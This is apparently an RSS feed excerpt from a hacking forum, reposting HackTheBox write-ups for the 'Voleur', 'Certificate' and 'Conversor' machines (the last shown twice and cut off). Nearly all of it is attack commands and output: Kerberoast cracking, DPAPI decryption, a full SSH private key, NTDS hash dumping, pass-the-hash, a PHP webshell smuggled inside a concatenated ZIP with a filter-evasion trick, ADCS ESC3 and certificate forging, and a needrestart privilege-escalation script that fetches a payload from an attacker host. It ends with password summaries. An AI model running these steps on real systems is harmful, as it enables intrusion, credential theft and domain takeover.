&#36;krb5tgs&#36;23&#36;*svc_winrm&#36;VOLEUR.HTB&#36;voleur.htb/svc_winrm*&#36;cf6535bc0a95a2ed7b815852807efa4a&#36;7c691543631009fafbab519015753c7a698f46eee1f81172b80fdc7870973917d63431bf32a302be9e41e8e8673c0c5fb3c532d0519992ccf29cdbf734110ea318f7c273267f5bd44ff89c3090a539c1c073b0ffce1271c0996951f850d627dd711136fc4b43d432339fe3ccb9b2cb5f80537dfab041dbed384d655a636ce03009d0f075c0ae151314739b464487e8db54661ae9b20dd4585ab895bfbc972979fe1cbccccfb1855e0b5b4b389ef54c26aa443e4db34d31ba325ffa413e7ff2411fe6f39abea6b62b9d20293aa9db7dbb422a108c2dcd357ebb4268255d182f2c06b682e98b56b7cf8094f50285e300c3cdf7f71054b14e0e04ac0d3d68644c290356457b55e6334054874aaa3d3eb6770f3fd859455ce5778532316cb3260f565bcafd7c7d2f144a55aa4447516ab48cbabf63f34b436164c69c0d304be917a8032406cdfa8d2c3b69ef545490ae5e6f109e6455445739b6283da1e819fbbbf0649b4b740cb444c7e38bc49ddb7372836c4a61039e3437165fd06231000cd41f5917494ab462999d0a885b3742dad0b3ca480a25bad5087c90d30f95633c5e3e105201cf82e7874ef0f1c15c1b88585ab5dddbf006e6b06b215eb3b8d23d7edc8da5f6e7bde088315e764129c6901d22922c5aa379c401a8dde101bf71d8f3dafacc33b994f807d1ae5138db18fd1757bf31eae41c98c6a68bc50809fca7973039c4899f878174a0933d69a8fa7eaa1eb8dd5688b319f66c7e3bc463f9bf92a9cc8bb96e740be99f8b74371ac102aafde1b96a1860f8478335296ff9d2827710349c61862e4c8b0dbaa4cbd62276e3a14075d3b70038fc25842e3210844fa7bf7cc1da0a209c08cf219fc0148ef19bd5efcb9d0bbacace0749fb18e665fa73b137952cbaf364005d5e6b1b70e916ef553d015de218974f5f5bbc7b677b5eb062ff2735a263f8afe77cc73f1acb026a33ebd5037990ddb8f108a5aeee0146a72ebf167a65c1bd0a1b68b0d4f283f3a1c688aba30b4169505def1b541010d2e54ab51ddcf1699bb3343d6a817a227a7c9df8d75c43d4da4eba17c6eed4d72b2450138e2135d80ffeb4d6393c95ad0bf28f74d43c960f6f6cc0aec28e07c5eb36b2665a2d261cfed516dd3cc459411da99ffa2d5dabc5c9dc899f537ef6add3deef15526fbb5175664c1f514f17c13de74c6d01f19b6ee93e911dbcc2a2b4b10e9a31aaf3c0fb6ed4a39e8a85a2b09c7b3c79b3f2b79345779d0aeef29c1d84d77a02f73e4f25bca3391c9795531bbd3c6fa371a69afa1c38185bfd47de627f8bf11601322bf16ddb73c68af700e3eccc901665cf4c227c4a6cb5f952ab35969934d40ae5699f6fe41dd0f839eaff4cb78a02023db6692d9ddf56dccdc3d3f33d934fc972bc2671c1e2a04bb97ddec87927918fb8b94ab59f9d6bbf13f08b100d767cce7c0ed386c4b64f9a11ebe387ed8e281106<br />
<br />
Crack TGS:<br />
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs kerberostable.txt<br />
Result: svc_winrm:AFireInsidedeOzarctica980219afi<br />
<br />
WINRM Access<br />
-------------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi'<br />
export KRB5CCNAME=FILE<img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fpwnforums.st%2Fimages%2Fsmilies%2Fconfused.png" alt="Confused" title="Confused" class="smilie smilie_13" />vc_winrm.ccache<br />
evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB<br />
<br />
Restore deleted user<br />
----------------------------------<br />
&#36;cred = [PSCredential]::new("svc_ldap@voleur.htb", (ConvertTo-SecureString "M1XyC9pW7qT5Vn" -AsPlainText -Force))<br />
Import-Module ActiveDirectory<br />
Get-ADObject -Filter {sAMAccountName -eq "todd.wolfe"} -IncludeDeletedObjects -Credential &#36;cred | Restore-ADObject -Credential &#36;cred<br />
Get-ADUser todd.wolfe<br />
<br />
Access TODD.WOLFE SMB Share<br />
---------------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/todd.wolfe:NightT1meP1dg3on14'<br />
KRB5CCNAME=todd.wolfe.ccache smbclient.py -k -no-pass VOLEUR.HTB/todd.wolfe@dc.voleur.htb<br />
<br />
use IT<br />
cd Second-Line Support<br />
cd Archived Users<br />
cd todd.wolfe<br />
<br />
DPAPI Creds extract<br />
----------------------------<br />
Found DPAPI protected creds in AppData/Roaming/Microsoft/<br />
<br />
Extract masterkey:<br />
dpapi.py masterkey -file "protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88" -sid "S-1-5-21-3927696377-1337352550-2781715495-1110" -password "NightT1meP1dg3on14"<br />
<br />
Masterkey:<br />
0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83<br />
<br />
Decrypt creds:<br />
dpapi.py credential -file "credentials/772275FAD58525253490A9B0039791D3" -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83<br />
<br />
Result:<br />
Username: jeremy.combs<br />
Password: qT3V9pLXyN7W4m<br />
<br />
JEREMY.COMBS Access<br />
-------------------<br />
getTGT.py -dc-ip 10.10.11.76 'voleur.htb/jeremy.combs:qT3V9pLXyN7W4m'<br />
export KRB5CCNAME=FILE:jeremy.combs.ccache<br />
<br />
evil-winrm -i dc.voleur.htb -k -u jeremy.combs -r VOLEUR.HTB (works but useless)<br />
<br />
KRB5CCNAME=jeremy.combs.ccache smbclient.py -k -no-pass VOLEUR.HTB/jeremy.combs@dc.voleur.htb<br />
<br />
SSH KEY Discover<br />
-----------------<br />
Found in SMB share:<br />
<br />
note.txt.txt:<br />
"Jeremy, I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux. Please see what you can set up. Thanks, Admin"<br />
<br />
id_rsa:<br />
-----BEGIN OPENSSH PRIVATE KEY-----<br />
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn<br />
NhAAAAAwEAAQAAAYEAqFyPMvURW/qbyRlemAMzaPVvfR7JNHznL6xDHP4o/hqWIzn3dZ66<br />
P2absMgZy2XXGf2pO0M13UidiBaF3dLNL7Y1SeS/DMisE411zHx6AQMepj0MGBi/c1Ufi7<br />
rVMq+X6NJnb2v5pCzpoyobONWorBXMKV9DnbQumWxYXKQyr6vgSrLd3JBW6TNZa3PWThy9<br />
wrTROegdYaqCjzk3Pscct66PhmQPyWkeVbIGZAqEC/edfONzmZjMbn7duJwIL5c68MMuCi<br />
9u91MA5FAignNtgvvYVhq/pLkhcKkh1eiR01TyUmeHVJhBQLwVzcHNdVk+GO+NzhyROqux<br />
haaVjcO8L3KMPYNUZl/c4ov80IG04hAvAQIGyNvAPuEXGnLEiKRcNg+mvI6/sLIcU5oQkP<br />
JM7XFlejSKHfgJcP1W3MMDAYKpkAuZTJwSP9ISVVlj4R/lfW18tKiiXuygOGudm3AbY65C<br />
lOwP+sY7+rXOTA2nJ3qE0J8gGEiS8DFzPOF80OLrAAAFiIygOJSMoDiUAAAAB3NzaC1yc2<br />
EAAAGBAKhcjzL1EVv6m8kZXpgDM2j1b30eyTR85y+sQxz+KP4aliM593Weuj9mm7DIGctl<br />
1xn9qTtDNd1InYgWhd3SzS+2NUnkvwzIrBONdcx8egEDHqY9DBgYv3NVH4u61TKvl+jSZ2<br />
9r+aQs6aMqGzjVqKwVzClfQ520LplsWFykMq+r4Eqy3dyQVukzWWtz1k4cvcK00TnoHWGq<br />
go85Nz7HHLeuj4ZkD8lpHlWyBmQKhAv3nXzjc5mYzG5+3bicCC+XOvDDLgovbvdTAORQIo<br />
JzbYL72FYav6S5IXCpIdXokdNU8lJnh1SYQUC8Fc3BzXVZPhjvjc4ckTqrsYWmlY3DvC9y<br />
jD2DVGZf3OKL/NCBtOIQLwECBsjbwD7hFxpyxIikXDYPpryOv7CyHFOaEJDyTO1xZXo0ih<br />
34CXD9VtzDAwGCqZALmUycEj/SElVZY+Ef5X1tfLSool7soDhrnZtwG2OuQpTsD/rGO/q1<br />
zkwNpyd6hNCfIBhIkvAxczzhfNDi6wAAAAMBAAEAAAGBAIrVgPSZaI47s5l6hSm/gfZsZl<br />
p8N5lD4nTKjbFr2SvpiqNT2r8wfA9qMrrt12+F9IInThVjkBiBF/6v7AYHHlLY40qjCfSl<br />
ylh5T4mnoAgTpYOaVc3NIpsdt9zG3aZlbFR+pPMZzAvZSXTWdQpCDkyR0QDQ4PY8Li0wTh<br />
FfCbkZd+TBaPjIQhMd2AAmzrMtOkJET0B8KzZtoCoxGWB4WzMRDKPbAbWqLGyoWGLI1Sj1<br />
MPZareocOYBot7fTW2C7SHXtPFP9+kagVskAvaiy5Rmv2qRfu9Lcj2TfCVXdXbYyxTwoJF<br />
ioxGl+PfiieZ6F8v4ftWDwfC+Pw2sD8ICK/yrnreGFNxdPymck+S8wPmxjWC/p0GEhilK7<br />
wkr17GgC30VyLnOuzbpq1tDKrCf8VA4aZYBIh3wPfWFEqhlCvmr4sAZI7B+7eBA9jTLyxq<br />
3IQpexpU8BSz8CAzyvhpxkyPXsnJtUQ8OWph1ltb9aJCaxWmc1r3h6B4VMjGILMdI/KQAA<br />
AMASKeZiz81mJvrf2C5QgURU4KklHfgkSI4p8NTyj0WGAOEqPeAbdvj8wjksfrMC004Mfa<br />
b/J+gba1MVc7v8RBtKHWjcFe1qSNSW2XqkQwxKb50QD17TlZUaOJF2ZSJi/xwDzX+VX9r+<br />
vfaTqmk6rQJl+c3sh+nITKBN0u7Fr/ur0/FQYQASJaCGQZvdbw8Fup4BGPtxqFKETDKC09<br />
41/zTd5viNX38LVig6SXhTYDDL3eyT5DE6SwSKleTPF+GsJLgAAADBANMs31CMRrE1ECBZ<br />
sP+4rqgJ/GQn4ID8XIOG2zti2pVJ0dx7I9nzp7NFSrE80Rv8vH8Ox36th/X0jme1AC7jtR<br />
B+3NLjpnGA5AqcPklI/lp6kSzEigvBl4nOz07fj3KchOGCRP3kpC5fHqXe24m3k2k9Sr+E<br />
a29s98/18SfcbIOHWS4AUpHCNiNskDHXewjRJxEoE/CjuNnrVIjzWDTwTbzqQV+FOKOXoV<br />
B9NzMi0MiCLy/HJ4dwwtce3sssxUk7pQAAAMEAzBk3mSKy7UWuhHExrsL/jzqxd7bVmLXU<br />
EEju52GNEQL1TW4UZXVtwhHYrb0Vnu0AE+r/16o0gKScaa+lrEeQqzIARVflt7ZpJdpl3Z<br />
fosiR4pvDHtzbqPVbixqSP14oKRSeswpN1Q50OnD11tpIbesjH4ZVEXv7VY9/Z8VcooQLW<br />
GSgUcaD+U9Ik13vlNrrZYs9uJz3aphY6Jo23+7nge3Ui7ADEvnD3PAtzclU3xMFyX9Gf+9<br />
RveMEYlXZqvJ9PAAAADXN2Y19iYWNrdXBAREMBAgMEBQ==<br />
-----END OPENSSH PRIVATE KEY-----<br />
<br />
SSH access via WSL<br />
--------------------------------<br />
chmod 400 id_rsa<br />
ssh -p 2222 -i id_rsa svc_backup@voleur.htb<br />
<br />
AD Database extract<br />
----------------------<br />
Found in /mnt/c/IT/THIRD-LINE SUPPORT/:<br />
./Active Directory: ntds.dit ntds.jfm<br />
./registry: SECURITY SYSTEM<br />
<br />
Extract NTLM hashes:<br />
secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit LOCAL<br />
<br />
Administrator hash:<br />
administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::<br />
<br />
Admin Access<br />
-----------<br />
getTGT.py -dc-ip 10.10.11.76 -hashes :e656e07c56d831611b577b160b259ad2 voleur.htb/administrator<br />
export KRB5CCNAME=FILE:administrator.ccache<br />
evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTB<br />
<br />
CREDENTIALS SUMMARY (for noobs)<br />
-------------------<br />
ryan.naylor:HollowOct31Nyt (Initial access)<br />
Todd.Wolfe:NightT1meP1dg3on14 (Restored account)<br />
svc_ldap:M1XyC9pW7qT5Vn (Excel file)<br />
svc_iis:N5pXyW1VqM7CZ8 (Excel file)<br />
svc_winrm:AFireInsidedeOzarctica980219afi (Kerberoasted)<br />
jeremy.combs:qT3V9pLXyN7W4m (DPAPI)<br />
administrator:e656e07c56d831611b577b160b259ad2 (NTDS dump)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HTB - CERTIFICATE.HTB - HARD WINDOWS]]></title>
			<link>https://pwnforums.st/Thread-HTB-CERTIFICATE-HTB-HARD-WINDOWS</link>
			<pubDate>Mon, 09 Feb 2026 16:49:01 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=372312">chain</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-HTB-CERTIFICATE-HTB-HARD-WINDOWS</guid>
			<description><![CDATA[CERTIFICATE - HACKTHEBOX<br />
WINDOWS - HARD<br />
(if you want my detailed cheat sheet with more explanations just ask)<br />
<br />
IP: 10.10.11.71<br />
Hostname: certificate.htb<br />
Domain: CERTIFICATE.HTB<br />
<br />
Initial access<br />
----------------------------------------<br />
Web app has file upload restrictions - bypassed via ZIP concatenation<br />
<br />
Exploit:<br />
echo "test" &gt; good.pdf<br />
echo "&lt;?php sys/tem(\&#36;_GET['cmd']); ?&gt;" &gt; x.php (REMOVE THE SLASH IN SYSTEM, ITS JUST 4 WAF BYPASS)<br />
zip good.zip good.pdf<br />
zip bad.zip x.php<br />
cat good.zip bad.zip &gt; final.zip<br />
<br />
Upload at: <a href="http://certificate.htb/upload.php?s_id=44" target="_blank" rel="noopener" class="mycode_url">http://certificate.htb/upload.php?s_id=44</a><br />
Upload final.zip -&gt; access webshell via x.php as xamppuser<br />
<br />
DB Enum<br />
--------------------<br />
Found creds in db.php: certificate_webapp_user:cert!f!c@teDBPWD<br />
<br />
MySQL queries (non-interactive shell): <a href="https://pastebin.com/Ni8az3vw" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/Ni8az3vw</a> (waf blocked me)<br />
<br />
Extracted hash:<br />
sara.b:&#36;2y&#36;04&#36;CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6<br />
(other hashes didn't crack)<br />
<br />
Cracked with hashcat:<br />
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt<br />
Result: sara.b:Blink182<br />
<br />
WINRM + PCAP Analysis<br />
---------------------<br />
evil-winrm -u "sara.b" -p "Blink182" -i "10.10.11.71"<br />
<br />
Found Kerberos AS-REQ in ~/ws-01/WS-01PktMon.pcap<br />
<br />
Extract cipher with tshark:<br />
tshark -r WS-01PktMon.pcap -Y "kerberos.msg_type==10 &amp;&amp; kerberos.CNameString &amp;&amp; kerberos.realm &amp;&amp; kerberos.cipher" -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher<br />
<br />
Cipher: 23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0<br />
<br />
Format for hashcat:<br />
&#36;krb5pa&#36;18&#36;Lion.SK&#36;CERTIFICATE.HTB&#36;23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0<br />
<br />
Crack:<br />
hashcat -m 19900 hash.txt /usr/share/wordlists/rockyou.txt -a 0<br />
Result: lion.sk:!QAZ2wsx<br />
<br />
ADCS ESC3 EXPLOIT<br />
----------------------<br />
evil-winrm -u "lion.sk" -p "!QAZ2wsx" -i "10.10.11.71"<br />
<br />
Enumerate ADCS:<br />
certipy find -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -vulnerable<br />
<br />
ESC3 conditions found:<br />
- Extended Key Usage: Certificate Request Agent<br />
- Enrollment Rights: CERTIFICATE.HTB\Domain CRA Managers (lion.sk is member)<br />
- Authorized Signatures Required: 0<br />
- Private Key Flag: ExportableKey<br />
<br />
Exploit ESC3:<br />
# Step 1: Request delegation cert<br />
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'<br />
<br />
# Step 2: Request cert on behalf of ryan.k<br />
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'SignedUser' -on-behalf-of ryan.k -pfx lion.sk.pfx<br />
(for -template use one with client auth enabled and lion.sk enrollment rights)<br />
<br />
# Step 3: Auth with cert<br />
ntpdate certificate.htb<br />
certipy auth -pfx ryan.k.pfx<br />
<br />
Got NTLM hash:<br />
ryan.k@certificate.htb: aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6<br />
<br />
Privesc<br />
----------------------------------<br />
evil-winrm -u "ryan.k" -H "b1bc3d70e70f4f36b1509a65ae1a2ae6" -i 10.10.11.71<br />
<br />
Download and run SeManageVolumeExploit: <a href="https://github.com/CsEnox/SeManageVolumeExploit/releases/tag/public" target="_blank" rel="noopener" class="mycode_url">https://github.com/CsEnox/SeManageVolume...tag/public</a><br />
<br />
Verify with: icacls C:/windows<br />
Should show BUILTIN\Users with (M) modify permissions<br />
(if you see "administrator" instead of "users" rerun exploit)<br />
<br />
CA private key extract<br />
---------------------------------<br />
(tried DLL hijacking but EDR blocked it :trolled<img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fpwnforums.st%2Fimages%2Fsmilies%2Fsmile.png" alt="Smile" title="Smile" class="smilie smilie_1" /><br />
<br />
Export CA private key:<br />
certutil -exportPFX my "Certificate-LTD-CA" C:\temp\x.pfx<br />
Download x.pfx to attacker box<br />
<br />
Forge admin cert:<br />
certipy forge -ca-pfx x.pfx -upn 'administrator@certificate.htb' -out system.pfx<br />
<br />
Auth as admin:<br />
ntpdate certificate.htb<br />
certipy auth -pfx system.pfx<br />
<br />
Got admin hash:<br />
administrator@certificate.htb: aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6<br />
<br />
Credential summary (for noobs)<br />
-------------------------------------------<br />
sara.b:Blink182 (WinRM)<br />
lion.sk:!QAZ2wsx (WinRM)<br />
certificate_webapp_user:cert!f!c@teDBPWD (MySQL)<br />
ryan.k:b1bc3d70e70f4f36b1509a65ae1a2ae6 (Pass-the-Hash)<br />
administrator:d804304519bf0143c14cbf1c024408c6 (Pass-the-Hash)]]></description>
			<content:encoded><![CDATA[CERTIFICATE - HACKTHEBOX<br />
WINDOWS - HARD<br />
(if you want my detailed cheat sheet with more explanations just ask)<br />
<br />
IP: 10.10.11.71<br />
Hostname: certificate.htb<br />
Domain: CERTIFICATE.HTB<br />
<br />
Initial access<br />
----------------------------------------<br />
Web app has file upload restrictions - bypassed via ZIP concatenation<br />
<br />
Exploit:<br />
echo "test" &gt; good.pdf<br />
echo "&lt;?php sys/tem(\&#36;_GET['cmd']); ?&gt;" &gt; x.php (REMOVE THE SLASH IN SYSTEM, ITS JUST 4 WAF BYPASS)<br />
zip good.zip good.pdf<br />
zip bad.zip x.php<br />
cat good.zip bad.zip &gt; final.zip<br />
<br />
Upload at: <a href="http://certificate.htb/upload.php?s_id=44" target="_blank" rel="noopener" class="mycode_url">http://certificate.htb/upload.php?s_id=44</a><br />
Upload final.zip -&gt; access webshell via x.php as xamppuser<br />
<br />
DB Enum<br />
--------------------<br />
Found creds in db.php: certificate_webapp_user:cert!f!c@teDBPWD<br />
<br />
MySQL queries (non-interactive shell): <a href="https://pastebin.com/Ni8az3vw" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/Ni8az3vw</a> (waf blocked me)<br />
<br />
Extracted hash:<br />
sara.b:&#36;2y&#36;04&#36;CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6<br />
(other hashes didn't crack)<br />
<br />
Cracked with hashcat:<br />
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt<br />
Result: sara.b:Blink182<br />
<br />
WINRM + PCAP Analysis<br />
---------------------<br />
evil-winrm -u "sara.b" -p "Blink182" -i "10.10.11.71"<br />
<br />
Found Kerberos AS-REQ in ~/ws-01/WS-01PktMon.pcap<br />
<br />
Extract cipher with tshark:<br />
tshark -r WS-01PktMon.pcap -Y "kerberos.msg_type==10 &amp;&amp; kerberos.CNameString &amp;&amp; kerberos.realm &amp;&amp; kerberos.cipher" -T fields -e kerberos.CNameString -e kerberos.realm -e kerberos.cipher<br />
<br />
Cipher: 23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0<br />
<br />
Format for hashcat:<br />
&#36;krb5pa&#36;18&#36;Lion.SK&#36;CERTIFICATE.HTB&#36;23f5159fa1c66ed7b0e561543eba6c010cd31f7e4a4377c2925cf306b98ed1e4f3951a50bc083c9bc0f16f0f586181c9d4ceda3fb5e852f0<br />
<br />
Crack:<br />
hashcat -m 19900 hash.txt /usr/share/wordlists/rockyou.txt -a 0<br />
Result: lion.sk:!QAZ2wsx<br />
<br />
ADCS ESC3 EXPLOIT<br />
----------------------<br />
evil-winrm -u "lion.sk" -p "!QAZ2wsx" -i "10.10.11.71"<br />
<br />
Enumerate ADCS:<br />
certipy find -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -vulnerable<br />
<br />
ESC3 conditions found:<br />
- Extended Key Usage: Certificate Request Agent<br />
- Enrollment Rights: CERTIFICATE.HTB\Domain CRA Managers (lion.sk is member)<br />
- Authorized Signatures Required: 0<br />
- Private Key Flag: ExportableKey<br />
<br />
Exploit ESC3:<br />
# Step 1: Request delegation cert<br />
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'<br />
<br />
# Step 2: Request cert on behalf of ryan.k<br />
certipy req -u 'lion.sk@certificate.htb' -p '!QAZ2wsx' -dc-ip 10.10.11.71 -ca 'Certificate-LTD-CA' -template 'SignedUser' -on-behalf-of ryan.k -pfx lion.sk.pfx<br />
(for -template use one with client auth enabled and lion.sk enrollment rights)<br />
<br />
# Step 3: Auth with cert<br />
ntpdate certificate.htb<br />
certipy auth -pfx ryan.k.pfx<br />
<br />
Got NTLM hash:<br />
ryan.k@certificate.htb: aad3b435b51404eeaad3b435b51404ee:b1bc3d70e70f4f36b1509a65ae1a2ae6<br />
<br />
Privesc<br />
----------------------------------<br />
evil-winrm -u "ryan.k" -H "b1bc3d70e70f4f36b1509a65ae1a2ae6" -i 10.10.11.71<br />
<br />
Download and run SeManageVolumeExploit: <a href="https://github.com/CsEnox/SeManageVolumeExploit/releases/tag/public" target="_blank" rel="noopener" class="mycode_url">https://github.com/CsEnox/SeManageVolume...tag/public</a><br />
<br />
Verify with: icacls C:/windows<br />
Should show BUILTIN\Users with (M) modify permissions<br />
(if you see "administrator" instead of "users" rerun exploit)<br />
<br />
CA private key extract<br />
---------------------------------<br />
(tried DLL hijacking but EDR blocked it :trolled<img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fpwnforums.st%2Fimages%2Fsmilies%2Fsmile.png" alt="Smile" title="Smile" class="smilie smilie_1" /><br />
<br />
Export CA private key:<br />
certutil -exportPFX my "Certificate-LTD-CA" C:\temp\x.pfx<br />
Download x.pfx to attacker box<br />
<br />
Forge admin cert:<br />
certipy forge -ca-pfx x.pfx -upn 'administrator@certificate.htb' -out system.pfx<br />
<br />
Auth as admin:<br />
ntpdate certificate.htb<br />
certipy auth -pfx system.pfx<br />
<br />
Got admin hash:<br />
administrator@certificate.htb: aad3b435b51404eeaad3b435b51404ee:d804304519bf0143c14cbf1c024408c6<br />
<br />
Credential summary (for noobs)<br />
-------------------------------------------<br />
sara.b:Blink182 (WinRM)<br />
lion.sk:!QAZ2wsx (WinRM)<br />
certificate_webapp_user:cert!f!c@teDBPWD (MySQL)<br />
ryan.k:b1bc3d70e70f4f36b1509a65ae1a2ae6 (Pass-the-Hash)<br />
administrator:d804304519bf0143c14cbf1c024408c6 (Pass-the-Hash)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[HTB - CONVERSOR.HTB - EASY LINUX]]></title>
			<link>https://pwnforums.st/Thread-HTB-CONVERSOR-HTB-EASY-LINUX</link>
			<pubDate>Mon, 09 Feb 2026 16:36:42 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://pwnforums.st/member.php?action=profile&uid=372312">chain</a>]]></dc:creator>
			<guid isPermaLink="false">https://pwnforums.st/Thread-HTB-CONVERSOR-HTB-EASY-LINUX</guid>
			<description><![CDATA[CONVERSOR - HACKTHEBOX<br />
LINUX - EASY<br />
IP: 10.10.11.1 (OLD)<br />
<br />
recon<br />
-----<br />
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.10.11.1 (ctf command)<br />
<br />
22/tcp - SSH OpenSSH 8.9p1<br />
80/tcp - HTTP Apache httpd 2.4.52<br />
<br />
Interesting endpoint:<br />
/convert - XML/XSLT template upload<br />
<br />
inital access<br />
------------------------------<br />
App allows XSLT template uploads. Downloaded source code, install.md reveals cron job executes all Python scripts in /scripts/ every minute.<br />
<br />
Malicious XSLT payload: <a href="https://pastebin.com/yXUvZ8es" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/yXUvZ8es</a> (bf block me <img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fpwnforums.st%2Fimages%2Fsmilies%2Fsad.png" alt="Sad" title="Sad" class="smilie smilie_8" /> )<br />
<br />
Get shell:<br />
1. Start listener<br />
2. Upload payload via web interface<br />
3. Wait for cron job execution (every 1 min)<br />
4. python3 -c 'import pty;pty.spawn("/bin/bash")'<br />
<br />
Credentials extract<br />
----------------------------------<br />
Source code contains SQLite DB users.db<br />
<br />
sqlite3 users.db<br />
.tables<br />
S/ELECT * F/ROM users; (remove the slash, waf block me)<br />
<br />
MD5 hash:<br />
fismathack:5b5c3ac3a1c897c94caad48e6c71fdec<br />
<br />
Cracked via CrackStation:<br />
fismathack:Keepmesafeandwarm<br />
<br />
SSH access:<br />
ssh fismathack@conversor.htb<br />
<br />
Privesc<br />
-------<br />
sudo -l<br />
<br />
User fismathack may run the following commands on conversor:<br />
    (ALL : ALL) NOPASSWD: /usr/sbin/needrestart<br />
<br />
Check version:<br />
/usr/sbin/needrestart --version<br />
<br />
needrestart 3.7 - Restart daemons after library updates.<br />
<br />
Vulnerable to CVE-2024-48990 (patched in 3.8)<br />
<br />
CVE-2024-48990 Exploit<br />
---------------------------<br />
Vuln allows Python injection via PYTHONPATH when needrestart runs with sudo<br />
<br />
Create malicious shared object (exploit.c): <a href="https://pastebin.com/cVZYXxRx" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/cVZYXxRx</a><br />
<br />
Compile:<br />
gcc -shared -fPIC -o __init__.so exploit.c<br />
<br />
exploit.sh:<br />
#!/bin/bash<br />
set -e<br />
<br />
cd /tmp<br />
mkdir -p malicious/importlib<br />
<br />
curl <a href="http://10.10.1X.X:8000/__init__.so" target="_blank" rel="noopener" class="mycode_url">http://10.10.1X.X:8000/__init__.so</a> -o /tmp/malicious/importlib/__init__.so<br />
<br />
/tmp/malicious/expl.py : <a href="https://pastebin.com/necqG4Tx" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/necqG4Tx</a><br />
<br />
cd /tmp/malicious<br />
PYTHONPATH="&#36;PWD" python3 expl.py 2&gt;/dev/null<br />
<br />
Terminal 1 (attacker):<br />
python3 -m http.server 8000<br />
<br />
Terminal 2 (victim - ssh #1):<br />
bash exploit.sh<br />
<br />
Terminal 3 (victim - ssh #2):<br />
sudo /usr/sbin/needrestart<br />
<br />
expl.py script detects SUID shell creation and executes it automatically<br />
<br />
whoami<br />
# root<br />
<br />
cat /root/root.txt<br />
<br />
Credentials summary (4 noob)<br />
-------------------<br />
fismathack:Keepmesafeandwarm (SSH)<br />
<br />
<br />
---<br />
<br />
reuploadin my old writeups not available on breachforums here, if a box already has a writeup i dont reupload, like the seasonal room pterodactyl]]></description>
			<content:encoded><![CDATA[CONVERSOR - HACKTHEBOX<br />
LINUX - EASY<br />
IP: 10.10.11.1 (OLD)<br />
<br />
recon<br />
-----<br />
nmap -sS -sV -sC -p- --min-rate=10000 -T5 --max-retries=2 --defeat-rst-ratelimit -Pn -oN nmap.txt 10.10.11.1 (ctf command)<br />
<br />
22/tcp - SSH OpenSSH 8.9p1<br />
80/tcp - HTTP Apache httpd 2.4.52<br />
<br />
Interesting endpoint:<br />
/convert - XML/XSLT template upload<br />
<br />
inital access<br />
------------------------------<br />
App allows XSLT template uploads. Downloaded source code, install.md reveals cron job executes all Python scripts in /scripts/ every minute.<br />
<br />
Malicious XSLT payload: <a href="https://pastebin.com/yXUvZ8es" target="_blank" rel="noopener" class="mycode_url">https://pastebin.com/yXUvZ8es</a> (bf block me <img src="https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fpwnforums.st%2Fimages%2Fsmilies%2Fsad.png" alt="Sad" title="Sad" class="smilie smilie_8" /> )<br />
<br />
Get shell:<br />
1. Start listener<br />
2. Upload payload via web interface<br />
3. Wait for cron job execution (every 1 min)<br />
